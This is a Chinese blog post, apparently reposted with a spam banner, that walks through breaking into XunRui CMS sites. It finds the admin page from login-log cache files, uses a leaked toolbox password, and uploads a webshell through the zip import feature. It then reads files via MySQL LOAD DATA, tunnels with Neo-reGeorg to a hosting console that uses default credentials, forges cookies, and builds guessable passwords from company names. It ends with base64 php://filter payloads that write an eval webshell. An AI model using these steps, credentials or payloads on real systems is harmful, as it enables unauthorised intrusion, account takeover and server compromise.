柚子快報邀請碼778899分享：網(wǎng)絡(luò)安全 迅睿CMS漏洞思考

http://yzkb.51969.com/

遇到個靶機是迅睿CMS?：

某CMS漏洞總結(jié)_長白山攻防實驗室的博客-CSDN博客

后續(xù)補充：

一：后臺地址

默認(rèn)后臺為/admin.php

遇到的靶機是/houtai.php

目標(biāo)旁站存在備份 版本為5. 4，靶機也存在備份，版本為5.1

旁站情況：網(wǎng)站根目錄下存在 /www.zip

里面數(shù)據(jù)庫配置信息和后臺地址都是假的，

/tool/login.php? 是迅睿工具箱地址 這個的密碼是 wangbiao88，登錄進去可修改后臺密碼，后面找到后臺后一樣的密碼。

第一步：找后臺地址：

默認(rèn)地址和掃目錄沒發(fā)現(xiàn)后臺地址但發(fā)現(xiàn)個/houtai/的目錄路徑 就是沒去試/houtai.php

/houtai.php 這個后臺路徑是在

/cache/log/202206/04.php? ?（按照年月/日期）如果登錄了不管成功和失敗就會生成緩存文件，密碼錯誤會記錄錯誤的md5密碼，不管成功失敗都會記錄顯示用戶名登錄。我遇到成功了也記錄了。

通過此文件成功找到后臺地址。

默認(rèn)用戶名admin? ?密碼就是泄露的迅睿工具箱源代碼中的密碼?\tool\config\pwd.php

二：旁站拿shell

后臺拿shell：后臺"應(yīng)用"->“聯(lián)動菜單”->"導(dǎo)入"處可上傳zip文件

本地新建一個123文件夾 再建立一個123文件夾 再放入你的shell.php

壓縮之后 --導(dǎo)入??

shell路徑：抓包會返回 目錄 一般為

/cache/temp/linkage-import-file-1-1/123/123/shell.php?

/cache/temp/linkage-import-file-1-2/123/123/shell.php?

/cache/temp/linkage-import-file-1-3/123/123/shell.php?

三：嘗試提權(quán)

拿到webshell之后。護衛(wèi)神，不支持aspx及aspx php很多馬都殺，不能執(zhí)行命令，反彈也執(zhí)行不了。不能直接跨站，

mysql數(shù)據(jù)庫低權(quán)限也不能都文件。

1.? CREATE TABLE `bbs` (`bbs1` TEXT NOT NULL );?

2.? load data local infile '//home//opendb.php' into table bbs;

3.? LOAD DATA LOCAL INFILE '/home/opendb.php' into table bbs fields terminated by '' LINES TERMINATED BY '\0';? ?（轉(zhuǎn)義用這個）

網(wǎng)上護衛(wèi)神主機提權(quán), 那個6588端口（直接訪問是訪問不到的需要做socks代理），php文件獲取session 偽造cookie? 3x版本應(yīng)該可以，目標(biāo)4x版本測試了不行。

過程：上傳Neo-reGeorg

生成python neoreg.py generate -k pass@123 生成socks5? shell 上傳目標(biāo)服務(wù)器

?python neoreg.py -k pass@123 -u http://www.abcd.com/cache/temp/linkage/import-file-1-2/cc/cc/tunnel.php? （本機執(zhí)行）

安裝Proxifier -- ?127.0.0.1 ?1080 ?選擇瀏覽器進程，范圍為，內(nèi)網(wǎng)ip或目標(biāo)范圍（本機配置）

瀏覽器輸入 目標(biāo)地址:6588 即可成功訪問?護衛(wèi)神 控制臺

低版本默認(rèn)?管理帳戶：huweishen ?管理密碼：huweishen.com

高版本的是隨機的強密碼。

利用護衛(wèi)神 那個php腳本獲取到cookie是隨機的，3x版本應(yīng)該可以，4x不行。

修改cookies 可以使用瀏覽器cookies插件，也可以使用?

瀏覽器 按F12? 輸入document.cookie 會顯示cookies值?

輸入?document.cookie="獲取到cookies? 還有path值"? 回車 F5刷新即可修改cookies了。

四：目標(biāo)情況。

目標(biāo)情況：網(wǎng)站根目錄也存在備份/backupdata.zip? 但是dedecms的信息，沒啥用

其實：網(wǎng)站后臺登錄會記錄內(nèi)容寫緩存到php文件，文件路徑為：/cache/log/202206/04.php（按照年月/日期）閉合了但是被轉(zhuǎn)義了，沒能getshell，

按照別人總結(jié)的版本提示文件不存在，也沒拿到shell，

迅睿工具箱地址也沒有，后臺是猜進去的。

按照旁站的版本，構(gòu)造一樣的包提示的，導(dǎo)入不能getshell? 少導(dǎo)入那個upload模塊。(旁站是import_upload) 這個版本沒有只有import

旁站盡量搞.net的站點。

還有一個社工密碼生成的規(guī)則。

公司名：如湘潭創(chuàng)榮經(jīng)濟發(fā)展集團有限公司 ：密碼就是chuangrou88 且存在用戶名chuangrou 那么他可能的用戶名有：

xtcf

xtcr

chuangfa

chuangrou

湘潭網(wǎng)丹互聯(lián)網(wǎng)集團有限公司官網(wǎng)：密碼就是wangdan88 wdjt wangdan xtwd

根據(jù)關(guān)鍵字組合去生成弱口令字典

補充：PHP文件上傳繞過-死亡exit.txt

https://www.equinox.chat/archives/28/

payload1:

txt=aPD9waHAgQGV2YWwoJF9QT1NUWydzaGVsbCddKTs/Pg==&filename=php://filter/write=convert.base64-decode/resource=shell.php

payload2:

txt=PD9waHAgQGV2YWwoJF9QT1NUWydzaGVsbCddKTs/Pg==&filename=php://filter/write=string.strip_tags|convert.base64-decode/resource=shell.php

柚子快報邀請碼778899分享：網(wǎng)絡(luò)安全 迅睿CMS漏洞思考

http://yzkb.51969.com/

參考文章